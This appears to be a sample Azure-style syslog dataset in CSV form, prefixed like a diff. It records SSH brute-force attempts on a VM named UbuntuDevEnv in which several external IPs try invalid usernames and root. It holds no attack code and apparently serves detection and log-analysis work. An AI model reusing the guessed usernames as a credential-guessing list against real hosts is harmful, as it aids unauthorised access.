+5669,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:29:01,UbuntuDevEnv,2019-06-26 16:29:01,auth,UbuntuDevEnv,info,Disconnected from invalid user zhan 119.59.113.183 port 53538 [preauth],36321,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zhan,119.59.113.1,53538,,
+5670,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:29:04,UbuntuDevEnv,2019-06-26 16:29:04,auth,UbuntuDevEnv,info,Invalid user beng from 66.70.130.155 port 43726,36346,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,beng,66.70.130.1,43726,,
+5671,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:29:04,UbuntuDevEnv,2019-06-26 16:29:04,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=66.70.130.155,36346,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,66.70.130.1,,0,
+5672,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:29:04,UbuntuDevEnv,2019-06-26 16:29:04,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,36346,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5673,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:29:05,UbuntuDevEnv,2019-06-26 16:29:05,auth,UbuntuDevEnv,info,Invalid user johannes from 119.59.113.183 port 53854,36352,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,johannes,119.59.113.1,53854,,
+5674,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:29:05,UbuntuDevEnv,2019-06-26 16:29:05,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,36352,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5675,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:29:05,UbuntuDevEnv,2019-06-26 16:29:05,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=119.59.113.183,36352,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.59.113.1,,0,
+5676,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:29:06,UbuntuDevEnv,2019-06-26 16:29:06,auth,UbuntuDevEnv,info,Failed password for invalid user beng from 66.70.130.155 port 43726 ssh2,36346,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,beng,66.70.130.1,43726,,
+5677,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:29:06,UbuntuDevEnv,2019-06-26 16:29:06,auth,UbuntuDevEnv,info,Received disconnect from 66.70.130.155 port 43726:11: Bye Bye [preauth],36346,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,66.70.130.1,43726,,
+5678,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:29:06,UbuntuDevEnv,2019-06-26 16:29:06,auth,UbuntuDevEnv,info,Disconnected from invalid user beng 66.70.130.155 port 43726 [preauth],36346,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,beng,66.70.130.1,43726,,
+5679,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:29:07,UbuntuDevEnv,2019-06-26 16:29:07,auth,UbuntuDevEnv,info,Failed password for invalid user johannes from 119.59.113.183 port 53854 ssh2,36352,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,johannes,119.59.113.1,53854,,
+5680,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:29:08,UbuntuDevEnv,2019-06-26 16:29:08,auth,UbuntuDevEnv,info,Received disconnect from 119.59.113.183 port 53854:11: Bye Bye [preauth],36352,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,119.59.113.1,53854,,
+5681,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:29:08,UbuntuDevEnv,2019-06-26 16:29:08,auth,UbuntuDevEnv,info,Disconnected from invalid user johannes 119.59.113.183 port 53854 [preauth],36352,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,johannes,119.59.113.1,53854,,
+5682,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:29:13,UbuntuDevEnv,2019-06-26 16:29:13,auth,UbuntuDevEnv,info,Invalid user m202 from 119.59.113.183 port 54202,36378,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,m202,119.59.113.1,54202,,
+5683,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:29:13,UbuntuDevEnv,2019-06-26 16:29:13,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,36378,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5684,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:29:13,UbuntuDevEnv,2019-06-26 16:29:13,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=119.59.113.183,36378,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.59.113.1,,0,
+5685,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:29:16,UbuntuDevEnv,2019-06-26 16:29:15,auth,UbuntuDevEnv,info,Failed password for invalid user m202 from 119.59.113.183 port 54202 ssh2,36378,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,m202,119.59.113.1,54202,,
+5686,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:29:16,UbuntuDevEnv,2019-06-26 16:29:16,auth,UbuntuDevEnv,info,Received disconnect from 119.59.113.183 port 54202:11: Bye Bye [preauth],36378,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,119.59.113.1,54202,,
+5687,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:29:16,UbuntuDevEnv,2019-06-26 16:29:16,auth,UbuntuDevEnv,info,Disconnected from invalid user m202 119.59.113.183 port 54202 [preauth],36378,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,m202,119.59.113.1,54202,,
+5688,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:29:23,UbuntuDevEnv,2019-06-26 16:29:22,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,36409,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5689,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:29:23,UbuntuDevEnv,2019-06-26 16:29:22,auth,UbuntuDevEnv,info,Invalid user www from 119.59.113.183 port 54534,36409,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,www,119.59.113.1,54534,,
+5690,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:29:23,UbuntuDevEnv,2019-06-26 16:29:22,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=119.59.113.183,36409,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.59.113.1,,0,
+5691,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:29:24,UbuntuDevEnv,2019-06-26 16:29:24,auth,UbuntuDevEnv,info,Failed password for invalid user www from 119.59.113.183 port 54534 ssh2,36409,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,www,119.59.113.1,54534,,
+5692,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:29:25,UbuntuDevEnv,2019-06-26 16:29:25,auth,UbuntuDevEnv,info,Disconnected from invalid user www 119.59.113.183 port 54534 [preauth],36409,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,www,119.59.113.1,54534,,
+5693,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:29:25,UbuntuDevEnv,2019-06-26 16:29:25,auth,UbuntuDevEnv,info,Received disconnect from 119.59.113.183 port 54534:11: Bye Bye [preauth],36409,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,119.59.113.1,54534,,
+5694,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:29:29,UbuntuDevEnv,2019-06-26 16:29:28,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93  user=root,36445,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,35.154.19.9,,0,
+5695,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:29:29,UbuntuDevEnv,2019-06-26 16:29:29,auth,UbuntuDevEnv,info,Invalid user db2inst1 from 119.59.113.183 port 54868,36440,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,db2inst1,119.59.113.1,54868,,
+5696,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:29:29,UbuntuDevEnv,2019-06-26 16:29:29,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,36440,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5697,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:29:29,UbuntuDevEnv,2019-06-26 16:29:29,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=119.59.113.183,36440,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.59.113.1,,0,
+5698,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:29:31,UbuntuDevEnv,2019-06-26 16:29:30,auth,UbuntuDevEnv,info,Failed password for root from 35.154.19.93 port 42464 ssh2,36445,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,42464,,
+5699,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:29:31,UbuntuDevEnv,2019-06-26 16:29:30,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 35.154.19.93 port 42464 [preauth],36445,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,35.154.19.9,42464,,
+5700,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:29:31,UbuntuDevEnv,2019-06-26 16:29:30,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 42464:11: Normal Shutdown, Thank you for playing [preauth]",36445,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,42464,,
+5701,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:29:31,UbuntuDevEnv,2019-06-26 16:29:31,auth,UbuntuDevEnv,info,Failed password for invalid user db2inst1 from 119.59.113.183 port 54868 ssh2,36440,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,db2inst1,119.59.113.1,54868,,
+5702,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:29:32,UbuntuDevEnv,2019-06-26 16:29:31,auth,UbuntuDevEnv,info,Disconnected from invalid user db2inst1 119.59.113.183 port 54868 [preauth],36440,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,db2inst1,119.59.113.1,54868,,
+5703,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:29:32,UbuntuDevEnv,2019-06-26 16:29:31,auth,UbuntuDevEnv,info,Received disconnect from 119.59.113.183 port 54868:11: Bye Bye [preauth],36440,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,119.59.113.1,54868,,
+5704,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:29:35,UbuntuDevEnv,2019-06-26 16:29:35,auth,UbuntuDevEnv,info,Invalid user andre from 119.59.113.183 port 55200,36467,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,andre,119.59.113.1,55200,,
+5705,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:29:35,UbuntuDevEnv,2019-06-26 16:29:35,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,36467,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5706,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:29:35,UbuntuDevEnv,2019-06-26 16:29:35,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=119.59.113.183,36467,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.59.113.1,,0,
+5707,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:29:37,UbuntuDevEnv,2019-06-26 16:29:36,auth,UbuntuDevEnv,info,Failed password for invalid user andre from 119.59.113.183 port 55200 ssh2,36467,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,andre,119.59.113.1,55200,,
+5708,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:29:37,UbuntuDevEnv,2019-06-26 16:29:36,auth,UbuntuDevEnv,info,Disconnected from invalid user andre 119.59.113.183 port 55200 [preauth],36467,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,andre,119.59.113.1,55200,,
+5709,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:29:37,UbuntuDevEnv,2019-06-26 16:29:36,auth,UbuntuDevEnv,info,Received disconnect from 119.59.113.183 port 55200:11: Bye Bye [preauth],36467,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,119.59.113.1,55200,,
+5710,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:29:40,UbuntuDevEnv,2019-06-26 16:29:39,auth,UbuntuDevEnv,info,Invalid user cacti from 202.88.241.107 port 38484,36487,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cacti,202.88.241.1,38484,,
+5711,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:29:40,UbuntuDevEnv,2019-06-26 16:29:39,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,36487,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5712,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:29:40,UbuntuDevEnv,2019-06-26 16:29:39,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=202.88.241.107,36487,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,202.88.241.1,,0,
+5713,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:29:41,UbuntuDevEnv,2019-06-26 16:29:40,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.22.251.129  user=root,36493,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,165.22.251.1,,0,
+5714,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:29:41,UbuntuDevEnv,2019-06-26 16:29:41,auth,UbuntuDevEnv,info,Failed password for invalid user cacti from 202.88.241.107 port 38484 ssh2,36487,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cacti,202.88.241.1,38484,,
+5715,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:29:41,UbuntuDevEnv,2019-06-26 16:29:41,auth,UbuntuDevEnv,info,Invalid user sshuser from 119.59.113.183 port 55530,36490,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sshuser,119.59.113.1,55530,,
+5716,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:29:41,UbuntuDevEnv,2019-06-26 16:29:41,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=119.59.113.183,36490,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.59.113.1,,0,
+5717,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:29:41,UbuntuDevEnv,2019-06-26 16:29:41,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,36490,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5718,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:29:41,UbuntuDevEnv,2019-06-26 16:29:41,auth,UbuntuDevEnv,info,"Received disconnect from 202.88.241.107 port 38484:11: Normal Shutdown, Thank you for playing [preauth]",36487,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,202.88.241.1,38484,,
+5719,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:29:41,UbuntuDevEnv,2019-06-26 16:29:41,auth,UbuntuDevEnv,info,Disconnected from invalid user cacti 202.88.241.107 port 38484 [preauth],36487,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cacti,202.88.241.1,38484,,
+5720,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:29:43,UbuntuDevEnv,2019-06-26 16:29:42,auth,UbuntuDevEnv,info,Failed password for root from 165.22.251.129 port 35202 ssh2,36493,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.22.251.1,35202,,
+5721,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:29:43,UbuntuDevEnv,2019-06-26 16:29:42,auth,UbuntuDevEnv,info,"Received disconnect from 165.22.251.129 port 35202:11: Normal Shutdown, Thank you for playing [preauth]",36493,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.22.251.1,35202,,
+5722,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:29:43,UbuntuDevEnv,2019-06-26 16:29:42,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 165.22.251.129 port 35202 [preauth],36493,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,165.22.251.1,35202,,
+5723,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:29:44,UbuntuDevEnv,2019-06-26 16:29:43,auth,UbuntuDevEnv,info,Failed password for invalid user sshuser from 119.59.113.183 port 55530 ssh2,36490,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sshuser,119.59.113.1,55530,,
+5724,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:29:44,UbuntuDevEnv,2019-06-26 16:29:43,auth,UbuntuDevEnv,info,Disconnected from invalid user sshuser 119.59.113.183 port 55530 [preauth],36490,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sshuser,119.59.113.1,55530,,
+5725,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:29:44,UbuntuDevEnv,2019-06-26 16:29:43,auth,UbuntuDevEnv,info,Received disconnect from 119.59.113.183 port 55530:11: Bye Bye [preauth],36490,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,119.59.113.1,55530,,
+5726,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:29:50,UbuntuDevEnv,2019-06-26 16:29:49,auth,UbuntuDevEnv,info,Invalid user uranus from 119.59.113.183 port 55860,36513,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,uranus,119.59.113.1,55860,,
+5727,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:29:50,UbuntuDevEnv,2019-06-26 16:29:49,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,36513,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5728,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:29:50,UbuntuDevEnv,2019-06-26 16:29:49,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=119.59.113.183,36513,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.59.113.1,,0,
